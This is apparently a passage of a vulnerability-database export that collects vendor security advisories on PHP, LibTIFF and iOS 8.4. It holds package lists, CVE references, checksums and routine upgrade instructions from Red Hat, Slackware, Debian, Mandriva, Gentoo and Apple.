7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nppc64:\nphp-5.4.16-36.el7_1.ppc64.rpm\nphp-cli-5.4.16-36.el7_1.ppc64.rpm\nphp-common-5.4.16-36.el7_1.ppc64.rpm\nphp-debuginfo-5.4.16-36.el7_1.ppc64.rpm\nphp-gd-5.4.16-36.el7_1.ppc64.rpm\nphp-ldap-5.4.16-36.el7_1.ppc64.rpm\nphp-mysql-5.4.16-36.el7_1.ppc64.rpm\nphp-odbc-5.4.16-36.el7_1.ppc64.rpm\nphp-pdo-5.4.16-36.el7_1.ppc64.rpm\nphp-pgsql-5.4.16-36.el7_1.ppc64.rpm\nphp-process-5.4.16-36.el7_1.ppc64.rpm\nphp-recode-5.4.16-36.el7_1.ppc64.rpm\nphp-soap-5.4.16-36.el7_1.ppc64.rpm\nphp-xml-5.4.16-36.el7_1.ppc64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.ppc64.rpm\n\ns390x:\nphp-5.4.16-36.el7_1.s390x.rpm\nphp-cli-5.4.16-36.el7_1.s390x.rpm\nphp-common-5.4.16-36.el7_1.s390x.rpm\nphp-debuginfo-5.4.16-36.el7_1.s390x.rpm\nphp-gd-5.4.16-36.el7_1.s390x.rpm\nphp-ldap-5.4.16-36.el7_1.s390x.rpm\nphp-mysql-5.4.16-36.el7_1.s390x.rpm\nphp-odbc-5.4.16-36.el7_1.s390x.rpm\nphp-pdo-5.4.16-36.el7_1.s390x.rpm\nphp-pgsql-5.4.16-36.el7_1.s390x.rpm\nphp-process-5.4.16-36.el7_1.s390x.rpm\nphp-recode-5.4.16-36.el7_1.s390x.rpm\nphp-soap-5.4.16-36.el7_1.s390x.rpm\nphp-xml-5.4.16-36.el7_1.s390x.rpm\nphp-xmlrpc-5.4.16-36.el7_1.s390x.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nphp-5.4.16-36.ael7b_1.src.rpm\n\nppc64le:\nphp-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-cli-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-common-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-gd-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-ldap-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mysql-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-odbc-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pdo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pgsql-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-process-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-recode-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-soap-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-xml-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-xmlrpc-5.4.16-36.ael7b_1.ppc64le.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nphp-bcmath-5.4.16-36.el7_1.ppc64.rpm\nphp-dba-5.4.16-36.el7_1.ppc64.rpm\nphp-debuginfo-5.4.16-36.el7_1.ppc64.rpm\nphp-devel-5.4.16-36.el7_1.ppc64.rpm\nphp-embedded-5.4.16-36.el7_1.ppc64.rpm\nphp-enchant-5.4.16-36.el7_1.ppc64.rpm\nphp-fpm-5.4.16-36.el7_1.ppc64.rpm\nphp-intl-5.4.16-36.el7_1.ppc64.rpm\nphp-mbstring-5.4.16-36.el7_1.ppc64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.ppc64.rpm\nphp-pspell-5.4.16-36.el7_1.ppc64.rpm\nphp-snmp-5.4.16-36.el7_1.ppc64.rpm\n\ns390x:\nphp-bcmath-5.4.16-36.el7_1.s390x.rpm\nphp-dba-5.4.16-36.el7_1.s390x.rpm\nphp-debuginfo-5.4.16-36.el7_1.s390x.rpm\nphp-devel-5.4.16-36.el7_1.s390x.rpm\nphp-embedded-5.4.16-36.el7_1.s390x.rpm\nphp-enchant-5.4.16-36.el7_1.s390x.rpm\nphp-fpm-5.4.16-36.el7_1.s390x.rpm\nphp-intl-5.4.16-36.el7_1.s390x.rpm\nphp-mbstring-5.4.16-36.el7_1.s390x.rpm\nphp-mysqlnd-5.4.16-36.el7_1.s390x.rpm\nphp-pspell-5.4.16-36.el7_1.s390x.rpm\nphp-snmp-5.4.16-36.el7_1.s390x.rpm\n\nx86_64:\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64le:\nphp-bcmath-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-dba-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-devel-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-embedded-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-enchant-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-fpm-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-intl-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mbstring-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mysqlnd-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pspell-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-snmp-5.4.16-36.ael7b_1.ppc64le.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-8142\nhttps://access.redhat.com/security/cve/CVE-2014-9652\nhttps://access.redhat.com/security/cve/CVE-2014-9705\nhttps://access.redhat.com/security/cve/CVE-2014-9709\nhttps://access.redhat.com/security/cve/CVE-2015-0231\nhttps://access.redhat.com/security/cve/CVE-2015-0232\nhttps://access.redhat.com/security/cve/CVE-2015-0273\nhttps://access.redhat.com/security/cve/CVE-2015-2301\nhttps://access.redhat.com/security/cve/CVE-2015-2348\nhttps://access.redhat.com/security/cve/CVE-2015-2783\nhttps://access.redhat.com/security/cve/CVE-2015-2787\nhttps://access.redhat.com/security/cve/CVE-2015-3307\nhttps://access.redhat.com/security/cve/CVE-2015-3329\nhttps://access.redhat.com/security/cve/CVE-2015-3330\nhttps://access.redhat.com/security/cve/CVE-2015-3411\nhttps://access.redhat.com/security/cve/CVE-2015-3412\nhttps://access.redhat.com/security/cve/CVE-2015-4021\nhttps://access.redhat.com/security/cve/CVE-2015-4022\nhttps://access.redhat.com/security/cve/CVE-2015-4024\nhttps://access.redhat.com/security/cve/CVE-2015-4025\nhttps://access.redhat.com/security/cve/CVE-2015-4026\nhttps://access.redhat.com/security/cve/CVE-2015-4147\nhttps://access.redhat.com/security/cve/CVE-2015-4148\nhttps://access.redhat.com/security/cve/CVE-2015-4598\nhttps://access.redhat.com/security/cve/CVE-2015-4599\nhttps://access.redhat.com/security/cve/CVE-2015-4600\nhttps://access.redhat.com/security/cve/CVE-2015-4601\nhttps://access.redhat.com/security/cve/CVE-2015-4602\nhttps://access.redhat.com/security/cve/CVE-2015-4603\nhttps://access.redhat.com/security/cve/CVE-2015-4604\nhttps://access.redhat.com/security/cve/CVE-2015-4605\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFViR1aXlSAg2UNWIIRAuxPAJ42GLQVzvzc9kje0VjDv8NZWcPv6QCbBL+O\ndtqycPWs+07GhjmZ6NNx5Bg=\n=FREZ\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/php-5.4.41-i486-1_slack14.1.txz: Upgraded. \n This update fixes some bugs and security issues. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7243\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.41-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.41-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.41-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.41-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.9-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.9-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 package:\n5e8d107dba11f8c87693edfdc32f56b7 php-5.4.41-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n24d6895fe6b0e9c88b04ceaccc35383d php-5.4.41-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n52011eec3a256a365789562b63e8ba84 php-5.4.41-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n82b75af6253121cab6cc84dd714f554c php-5.4.41-x86_64-1_slack14.1.txz\n\nSlackware -current package:\ne1c64f133f44b0abac21e0846e39d3c8 n/php-5.6.9-i586-1.txz\n\nSlackware x86_64 -current package:\nae51c99af34a4bd8721e7140c38a8c1a n/php-5.6.9-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg php-5.4.41-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n# /etc/rc.d/rc.httpd stop\n# /etc/rc.d/rc.httpd start\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nCVE-2015-4024\n\n Denial of service when processing multipart/form-data requests. \n\nCVE-2015-4022\n\n Integer overflow in the ftp_genlist() function may result in\n denial of service or potentially the execution of arbitrary code. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.4.41-0+deb7u1. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.9+dfsg-0+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 5.6.9+dfsg-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 5.6.9+dfsg-1. \n\nWe recommend that you upgrade your php5 packages",
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VAR-201803-0086
Vulnerability from variot - Updated: 2026-04-10 21:58LibTIFF 4.0.3 allows remote attackers to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via a crafted TIFF image, as demonstrated by failure of tif_next.c to verify that the BitsPerSample value is 2, and the t2p_sample_lab_signed_to_unsigned function in tiff2pdf.c. LibTIFF Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. LibTIFF is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to cause the application to crash, denying service to legitimate users. A denial of service vulnerability exists in Silicon Graphics LibTiff version 4.0.3.
Update:
Packages for Mandriva Business Server 1 are now being provided.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8127 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8128 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8129 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8130 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9655 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1547 http://advisories.mageia.org/MGASA-2015-0112.html
Updated Packages:
Mandriva Business Server 1/X86_64: f8727a71ac4ec2d7d4f1b633d6953822 mbs1/x86_64/lib64tiff5-4.0.4-0.1.mbs1.x86_64.rpm 32cdb5ebbe9aa26837e492bbc226f6eb mbs1/x86_64/lib64tiff-devel-4.0.4-0.1.mbs1.x86_64.rpm 917c2cf43c35469c768e62f9b670efd0 mbs1/x86_64/lib64tiff-static-devel-4.0.4-0.1.mbs1.x86_64.rpm 36ff180f975358b530230a3c0bf6ee64 mbs1/x86_64/libtiff-progs-4.0.4-0.1.mbs1.x86_64.rpm abad0883b65d252bd62ca2ea163a0754 mbs1/SRPMS/libtiff-4.0.4-0.1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. It is called by numerous programs, including GNOME and KDE applications, to interpret TIFF images. Please review the CVE identifier and bug reports referenced for details.
Workaround
There is no known workaround at this time.
Resolution
All libTIFF users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/tiff-4.0.7"
References
[ 1 ] CVE-2013-4243 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4243 [ 2 ] CVE-2014-8127 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8127 [ 3 ] CVE-2014-8128 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8128 [ 4 ] CVE-2014-8129 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8129 [ 5 ] CVE-2014-8130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8130 [ 6 ] CVE-2014-9330 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9330 [ 7 ] CVE-2014-9655 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9655 [ 8 ] CVE-2015-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1547 [ 9 ] CVE-2015-7313 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7313 [ 10 ] CVE-2015-7554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7554 [ 11 ] CVE-2015-8665 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8665 [ 12 ] CVE-2015-8668 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8668 [ 13 ] CVE-2015-8683 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8683 [ 14 ] CVE-2015-8781 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8781 [ 15 ] CVE-2015-8782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8782 [ 16 ] CVE-2015-8783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8783 [ 17 ] CVE-2015-8784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8784 [ 18 ] CVE-2016-3186 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3186 [ 19 ] CVE-2016-3619 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3619 [ 20 ] CVE-2016-3620 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3620 [ 21 ] CVE-2016-3621 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3621 [ 22 ] CVE-2016-3622 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3622 [ 23 ] CVE-2016-3623 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3623 [ 24 ] CVE-2016-3624 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3624 [ 25 ] CVE-2016-3625 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3625 [ 26 ] CVE-2016-3631 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3631 [ 27 ] CVE-2016-3632 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3632 [ 28 ] CVE-2016-3633 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3633 [ 29 ] CVE-2016-3634 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3634 [ 30 ] CVE-2016-3658 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3658 [ 31 ] CVE-2016-3945 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3945 [ 32 ] CVE-2016-3990 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3990 [ 33 ] CVE-2016-3991 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3991 [ 34 ] CVE-2016-5102 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5102 [ 35 ] CVE-2016-5314 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5314 [ 36 ] CVE-2016-5315 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5315 [ 37 ] CVE-2016-5316 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5316 [ 38 ] CVE-2016-5317 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5317 [ 39 ] CVE-2016-5318 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5318 [ 40 ] CVE-2016-5319 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5319 [ 41 ] CVE-2016-5320 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5320 [ 42 ] CVE-2016-5321 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5321 [ 43 ] CVE-2016-5322 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5322 [ 44 ] CVE-2016-5323 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5323 [ 45 ] CVE-2016-5652 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5652 [ 46 ] CVE-2016-5875 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5875 [ 47 ] CVE-2016-6223 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6223 [ 48 ] CVE-2016-8331 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8331 [ 49 ] CVE-2016-9273 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9273 [ 50 ] CVE-2016-9297 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9297 [ 51 ] CVE-2016-9318 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9318 [ 52 ] CVE-2016-9448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9448 [ 53 ] CVE-2016-9453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9453 [ 54 ] CVE-2016-9532 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9532
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201701-16
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us.
License
Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--WUa5dgL7FmU1aSF31hCrUKc2JiSevbqka--
.
For the oldstable distribution (wheezy), these problems have been fixed in version 4.0.2-6+deb7u4.
For the stable distribution (jessie), these problems have been fixed before the initial release.
We recommend that you upgrade your tiff packages. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2015-06-30-1 iOS 8.4
iOS 8.4 is now available and addresses the following:
Application Store Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious universal provisioning profile app may prevent apps from launching Description: An issue existed in the install logic for universal provisioning profile apps, which allowed a collision to occur with existing bundle IDs. CVE-ID CVE-2015-3722 : Zhaofeng Chen, Hui Xue, and Tao (Lenx) Wei from FireEye, Inc. CVE-ID CVE-2015-3710 : Aaron Sigel of vtty.com, Jan Soucek
MobileInstallation Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious universal provisioning profile app can prevent a Watch app from launching Description: An issue existed in the install logic for universal provisioning profile apps on the Watch which allowed a collision to occur with existing bundle IDs. CVE-ID CVE-2015-3725 : Zhaofeng Chen, Hui Xue, and Tao (Lenx) Wei from FireEye, Inc.
Safari Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may compromise user information on the filesystem Description: A state management issue existed in Safari that allowed unprivileged origins to access contents on the filesystem. CVE-ID CVE-2015-1155 : Joe Vennix of Rapid7 Inc. CVE-ID CVE-2015-3726 : Matt Spisak of Endgame
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website by clicking a link may lead to user interface spoofing Description: An issue existed in the handling of the rel attribute in anchor elements. Target objects could get unauthorized access to link objects. CVE-ID CVE-2015-3659 : Peter Rutenbar working with HP's Zero Day Initiative
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A maliciously crafted website can access the WebSQL databases of other websites Description: An issue existed in the authorization checks for renaming WebSQL tables which could have allowed a maliciously crafted website to access databases belonging to other websites. CVE-ID CVE-2015-3728 : Brian W. Gray of Carnegie Mellon University, Craig Young from TripWire
Installation note:
This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
- Navigate to Settings
- Select General
- Select About. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
